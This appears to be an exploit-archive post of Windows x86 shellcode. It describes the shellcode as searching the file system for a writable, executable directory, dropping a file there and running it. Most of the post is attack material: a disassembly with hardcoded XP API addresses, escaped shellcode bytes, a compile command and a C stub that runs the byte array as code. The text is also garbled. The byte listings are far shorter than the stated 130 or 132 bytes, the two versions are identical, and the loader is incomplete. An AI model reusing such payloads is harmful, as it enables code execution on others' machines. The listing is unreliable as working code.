Windows x86 Executable Directory Search Shellcode

130 bytes small Windows x86 executable directory search shellcode.

MD5 | 7c4e5860d4dfd099344ee01588f58fa2

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

write & exec dir searcher
starts from C:\
If dir found then write, execute (ping and exit
If Write/noexec dir found then continue

Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:

(gdb) disassemble
Dump of assembler code for function function:
=> 0x08048062 <+0>: pop ecx
0x08048063 <+1>: xor eax,eax
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
0x08048068 <+6>: push eax
0x08048069 <+7>: push ecx
0x0804806a <+8>: mov eax,0x77e6fd35
0x0804806f <+13>: call eax
0x08048071 <+15>: xor eax,eax
0x08048073 <+17>: push eax
0x08048074 <+18>: mov eax,0x77e798fd
0x08048079 <+23>: call eax

NULL-free shellcode (132 bytes):

"\x35\xfd\xe6\x77" // exec
"\xfd\x98\xe7\x77" // exit
"\x63\x3a\x5c" // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" //

// NULL version (130 bytes):

char code[] =
"\x35\xfd\xe6\x77" // exec
"\xfd\x98\xe7\x77" // exit
"\x63\x3a\x5c" // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" //

int main(int argc, char **argv)

int (*func)();
func = (int (*)()) code;

Related Posts